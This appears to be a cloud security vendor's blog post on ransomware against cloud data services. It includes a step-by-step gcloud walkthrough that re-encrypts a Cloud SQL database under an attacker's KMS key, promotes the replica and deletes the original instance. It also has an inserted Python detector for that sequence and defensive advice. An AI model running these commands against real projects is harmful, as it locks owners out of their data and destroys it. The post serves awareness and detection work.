In our previous article on Cloud Heists, we highlighted how attackers exploit credential theft and privilege escalation to take over cloud environments. However, ransomware poses an even broader threat, targeting cloud platforms to steal sensitive data, disrupt business operations, and hold companies hostage. In this post, we’ll explore these growing ransomware trends and offer insights on how to help protect your organization.

The Evolution of Ransomware in the Cloud Era

As cloud platforms evolve and offer increasingly more capabilities, our findings indicate that attackers aim to use these cloud services to access large volumes of sensitive data and critical applications, making these attacks especially harmful. Given the centralized nature of cloud services, a breach can affect multiple users and services at once, leading to financial losses and damaging a company’s reputation. With more businesses relying on the cloud, understanding these evolving risks is vital.

Let’s take a look at some risks associated with cloud environments, along with real-world examples that show just how damaging these vulnerabilities can be.

Data Risks in Cloud Environments

  1. Data Exfiltration: Attackers can steal vast amounts of data by exploiting poorly secured APIs or by using legitimate cloud storage transfer services. For instance, in 2024 attackers accessed customer accounts at Snowflake, a cloud storage provider, using stolen login credentials. This breach affected multiple companies, leading to the exposure of sensitive data. Following the breach, the attackers issued ransom demands, threatening to release the stolen information unless payments were made, putting further pressure on the affected organizations.
  2. Exploitation of Misconfigured Storage: According to a survey conducted by Verizon, misconfigured cloud storage accounts for 10% of data breaches. When attackers encounter such misconfigurations, they can expose vast amounts of sensitive records and affect millions of people. A notable example is Pegasus Airlines’ misconfigured AWS S3 bucket, which exposed sensitive passenger data of approximately 6.5 million people in 2022.
  3. Data Corruption: In some cases, attackers don’t just steal data – they corrupt it, leading to prolonged downtime and costly recovery efforts.
  4. Lack of Backup Protection: A poorly implemented backup policy can make recovery nearly impossible after a ransomware attack. Organizations without strong backup systems risk data loss and service interruptions.

Intellectual Property (IP) Theft

  1. Source Code Repositories: Cloud-based code repositories are frequent targets for IP theft. A breach in these repositories can expose sensitive company information, enable unauthorized modifications, and risk malicious exploitation or public release. One example is the 2024 breach at The New York Times, which exposed sensitive information and source code: using stolen GitHub credentials, the attackers accessed over 5,000 repositories containing internal source code.
  2. Design Documents and Trade Secrets: Valuable design documents and trade secrets stored in cloud systems are high-risk assets with potentially severe implications if exposed. For instance, in January 2024, Mercedes-Benz experienced a security breach that exposed the company’s intellectual property, passwords, and cloud access keys. Such breaches not only compromise proprietary information but also threaten a company’s reputation and could have long-term impacts on innovation and market positioning.

Encryption Takeover in the Cloud

  1. Abuse of Cloud Encryption APIs: Attackers can abuse encryption APIs to re-encrypt victim data, effectively locking organizations out of their own systems and blocking their access to essential information. This tactic can severely disrupt operations, delay recovery efforts, and force organizations into difficult decisions regarding data retrieval or ransom payments.
  2. Key Management Weaknesses: Improper key management, such as failing to rotate encryption keys or storing them insecurely, exposes companies to encryption takeovers. These vulnerabilities can grant attackers unauthorized access to protected data, increasing the risk of data breaches and unauthorized decryption, which can disrupt services and put the company’s data integrity at risk.

Step-by-Step Attack Scenario: Cloud SQL Ransomware

Next, we will dive into an example of how an attacker might carry out a cloud ransomware attack. In this scenario, the attacker leverages Google Cloud SQL’s replication capabilities by transferring encrypted data to a new Cloud SQL instance under their control, using a custom key ring and encryption key created within Google Cloud Key Management Service (KMS). This setup grants the attacker exclusive access to the encryption, allowing them to re-encrypt the data in a way that only they can decrypt. This tactic allows the attacker to effectively lock legitimate users out of their own data.

Step 1: Create the Cloud SQL Service Account

To use Customer-Managed Encryption Keys (CMEK) with Cloud SQL, a dedicated Cloud SQL service account is required. In some cases, this service account might not be automatically created. We start by ensuring that this service account is available, as it will handle encryption and decryption operations for instances using CMEK.

gcloud beta services identity create \
  --service=sqladmin.googleapis.com \
  --project=<PROJECT-ID>


Step 2: Create Key Rings and CMEK Keys for Victim and Attacker

Next, we need two separate encryption keys: one for the victim’s Cloud SQL instance and one for the attacker’s replica. By creating separate key rings and CMEK keys in different regions, the attacker can re-encrypt the data with a key under their control. This setup allows the attacker to deny access to the victim’s data once it is encrypted with the new key.

  1. Create the Victim Key Ring and Key:
gcloud kms keyrings create victim-keyring --location=<VICTIM-REGION> --project=<PROJECT-ID>
gcloud kms keys create victim-cmek-key \
  --location=<VICTIM-REGION> --keyring=victim-keyring --purpose=encryption \
  --project=<PROJECT-ID>


  2. Create the Attacker Key Ring and Key:
gcloud kms keyrings create attacker-keyring --location=<ATTACKER-REGION> --project=<PROJECT-ID>
gcloud kms keys create attacker-cmek-key \
  --location=<ATTACKER-REGION> --keyring=attacker-keyring --purpose=encryption \
  --project=<PROJECT-ID>


Step 3: Grant Permissions on the Victim and Attacker CMEK Keys

For Cloud SQL to use the CMEK keys during instance creation and replication, the Cloud SQL service account needs access to both keys. Here, we grant the Cloud SQL service account permission to encrypt and decrypt data with each CMEK key, enabling it to create and manage instances using these keys.

  1. Retrieve Project Number:
gcloud projects describe <PROJECT-ID> --format="value(projectNumber)"


  2. Grant Access on the Victim CMEK Key:
gcloud kms keys add-iam-policy-binding victim-cmek-key \
  --location=<VICTIM-REGION> --keyring=victim-keyring \
  --member="serviceAccount:service-<project-number>@gcp-sa-cloud-sql.iam.gserviceaccount.com" \
  --role="roles/cloudkms.cryptoKeyEncrypterDecrypter" \
  --project=<PROJECT-ID>


  3. Grant Access on the Attacker CMEK Key:
gcloud kms keys add-iam-policy-binding attacker-cmek-key \
  --location=<ATTACKER-REGION> --keyring=attacker-keyring \
  --member="serviceAccount:service-<project-number>@gcp-sa-cloud-sql.iam.gserviceaccount.com" \
  --role="roles/cloudkms.cryptoKeyEncrypterDecrypter" \
  --project=<PROJECT-ID>


Step 4: Create the Victim Cloud SQL Instance with CMEK

Now, we set up the victim’s Cloud SQL instance using the victim’s CMEK key.

Note: Make sure that the instance region matches the region of the key.

gcloud sql instances create victim-instance \
  --project=<PROJECT-ID> \
  --database-version=MYSQL_8_0 \
  --cpu=2 --memory=7680MB \
  --region=<VICTIM-REGION> \
  --storage-auto-increase \
  --enable-bin-log \
  --disk-encryption-key=projects/<PROJECT-ID>/locations/<VICTIM-REGION>/keyRings/victim-keyring/cryptoKeys/victim-cmek-key


Step 5: Create the Attacker’s Instance (Replica of the Victim’s Instance)

With the victim’s instance in place, the attacker can now create a replica of this instance in a different region. The replica will be encrypted with the attacker’s CMEK key, so the data is re-encrypted under the attacker’s control.

Note: Make sure that the replica region matches the region of the attacker key.

gcloud sql instances create attacker-instance \
  --master-instance-name=victim-instance \
  --region=<ATTACKER-REGION> \
  --disk-encryption-key=projects/<PROJECT-ID>/locations/<ATTACKER-REGION>/keyRings/attacker-keyring/cryptoKeys/attacker-cmek-key


Step 6: Promote the Replica to Standalone

After replication is complete, the attacker promotes the replica to a standalone instance. This action breaks the link with the original (victim) instance, effectively creating an independent copy of the data encrypted with the attacker’s CMEK key. The data is now fully controlled by the attacker, denying the victim any access.

gcloud sql instances promote-replica attacker-instance


Step 7: Disable or Delete the Original Cloud SQL Instance

To complete the attack, the attacker deletes or disables the original victim-instance. By removing this instance, the attacker ensures that the only accessible version of the data is in attacker-instance, now encrypted with the attacker’s CMEK key. Alternatively, the attacker could modify access controls on victim-instance to further limit the victim’s ability to access their data.

gcloud sql instances delete victim-instance --quiet


Evading Ransomware Attacks with Runtime Protection in the Cloud

Effective runtime monitoring is crucial for detecting and responding to potential security threats in cloud environments, especially in scenarios like the one described above.

Next, we will highlight key aspects of runtime monitoring that can help organizations identify and mitigate risks at various stages of a potential breach, from initial reconnaissance to data exfiltration and manipulation.

By understanding how attackers carry out such attacks and which security measures can stop them, you can better prepare your cloud infrastructure against similar threats. Use the following runtime-focused tips to evade cloud ransomware:

Monitor the Listing of Public Data Resources

  • Keep an eye on unusual API calls to sensitive services such as storage object services and managed databases, especially from unfamiliar IP addresses.
  • Use eBPF to track outbound DNS requests and connections to internal data service endpoints. This can help identify scanning activity.
  • Track newly exposed resources such as managed databases, cloud storage, and data platforms.

Identify Who Accesses Vulnerable Resources

  • Enable and analyze logs for all object-level operations on your cloud storage buckets.
  • Monitor for unexpected credential usage or permission changes.
  • Monitor for high volumes of file read operations, which could indicate someone is exploring the bucket’s content.

Block Exfiltration of Sensitive Data

  • Use eBPF for real-time network traffic analysis to monitor and block suspicious outbound data transfers, particularly large data movements to unfamiliar destinations.
  • By defining a baseline of normal business traffic, you can use eBPF network tracing to identify out-of-baseline communications, such as those ransomware performs for lateral movement in the cluster.

Monitor for Data Modification

  • Monitor file system activities for any unusual write operations that could indicate data modification.
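The Cloud SQL scenario above, seen from the monitoring side, as an added example that is not part of the original post or Upwind’s product: a detector run over a few constructed, simplified Cloud Audit Log entries that flags a replica created under a key from a different key ring than its primary’s, and raises the severity when the same principal promotes that replica or deletes the primary within a time window. The flat event shape and the PRIMARY_KEYS inventory are assumptions (real entries nest these fields under protoPayload); the method and request field names follow the Cloud SQL Admin API.

```python
from datetime import datetime, timedelta
# Constructed, simplified Cloud Audit Log entries (protoPayload fields only) modelling the
# scenario above; field names follow the Cloud SQL Admin API, all values are made up.
SAMPLE_LOG = [
    {"timestamp": "2024-10-01T10:05:00Z", "methodName": "cloudsql.instances.create",
     "principalEmail": "attacker@example.com",
     "request": {"name": "attacker-instance", "masterInstanceName": "victim-instance",
                 "diskEncryptionConfiguration": {"kmsKeyName": "projects/p/locations/us-east1/"
                 "keyRings/attacker-keyring/cryptoKeys/attacker-cmek-key"}}},
    {"timestamp": "2024-10-01T10:40:00Z", "methodName": "cloudsql.instances.promoteReplica",
     "principalEmail": "attacker@example.com",
     "resourceName": "projects/p/instances/attacker-instance"},
    {"timestamp": "2024-10-01T10:45:00Z", "methodName": "cloudsql.instances.delete",
     "principalEmail": "attacker@example.com",
     "resourceName": "projects/p/instances/victim-instance"},
]
# Constructed inventory (assumption): primary instance -> the CMEK key it was created with.
PRIMARY_KEYS = {"victim-instance": "projects/p/locations/us-central1/"
                "keyRings/victim-keyring/cryptoKeys/victim-cmek-key"}

def keyring_of(key_name):
    """'projects/.../keyRings/<ring>' prefix of a full CMEK resource name."""
    return key_name.split("/cryptoKeys/")[0]
parse_ts = lambda ts: datetime.fromisoformat(ts.replace("Z", "+00:00"))

def detect_cmek_takeover(events, primary_keys, window=timedelta(hours=2)):
    """Flag replicas whose disk key is on a different key ring than the primary's; severity
    rises when the same principal then promotes the replica or deletes the primary."""
    findings = []
    for i, ev in enumerate(events):
        req = ev.get("request", {})
        primary, replica = req.get("masterInstanceName"), req.get("name")
        key = req.get("diskEncryptionConfiguration", {}).get("kmsKeyName")
        if ev["methodName"] != "cloudsql.instances.create" or primary not in primary_keys or not key:
            continue
        if keyring_of(key) == keyring_of(primary_keys[primary]):
            continue  # replica on the primary's own key ring: expected CMEK usage
        t0 = parse_ts(ev["timestamp"])
        hits = lambda e, m, name: (e["methodName"] == m
                                   and e.get("resourceName", "").endswith("/instances/" + name))
        followups = [e["methodName"] for e in events[i + 1:]
                     if e["principalEmail"] == ev["principalEmail"]
                     and parse_ts(e["timestamp"]) - t0 <= window
                     and (hits(e, "cloudsql.instances.promoteReplica", replica)
                          or hits(e, "cloudsql.instances.delete", primary))]
        findings.append({"replica": replica, "primary": primary, "actor": ev["principalEmail"],
                         "foreign_key": key, "followups": followups,
                         "severity": "critical" if followups else "high"})
    return findings
```

The replica creation under a foreign key ring is the earliest point at which this sequence is visible; the promote and delete calls only confirm it, so alert on the "high" finding rather than waiting for "critical".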

What CISOs Can Do to Protect Cloud Data Services

To effectively secure cloud environments, CISOs should adopt the following key practices:

  • Strengthen Authentication: Implement multi-factor authentication (MFA) and explore passwordless options.
  • Encrypt Everything: Ensure your cloud provider’s encryption protocols cover data at rest, in transit, and during processing. Also, prioritize proper key management to avoid vulnerabilities in encryption takeovers.
  • Conduct Regular Audits: Frequent cloud configuration checks can prevent misconfigurations, which are responsible for over 67% of cloud breaches. Use tools like AWS CloudTrail for continuous monitoring.
  • Backup and Test: A solid backup plan is critical. Features like versioning and object lock can help, especially in the event of a ransomware attack.
  • Limit Access Rights: Limit access by applying the principle of least privilege to high-risk areas like databases, storage buckets, and management interfaces. Regularly review and restrict who can modify or view sensitive resources, ensuring only essential personnel have access. Automate these reviews to promptly remove unused permissions and close potential entry points.

How Upwind Protects You from These Threats

Upwind’s runtime-powered cloud security platform offers comprehensive protection through advanced threat detection, posture analysis, and API security.

Our eBPF-based sensor provides real-time insight into processes, network activity, and file system access across Kubernetes workloads and virtual machines. Combining the sensor with our real-time integration with the cloud provider allows us to identify weak configurations, detect misuse of managed services, and create security baselines for normal resource behavior.

By leveraging machine learning to analyze typical patterns, Upwind proactively alerts you about suspicious activities that deviate from established baselines.

Our platform also includes features like API endpoint cataloging, vulnerability scanning, and automated threat response. Through these capabilities, Upwind helps mitigate risks before they escalate into full-scale attacks, reducing alert noise by 95% and enabling teams to identify root causes 10x faster.

Learn More

To learn more about how Upwind protects users from cloud ransomware attacks, schedule a demo.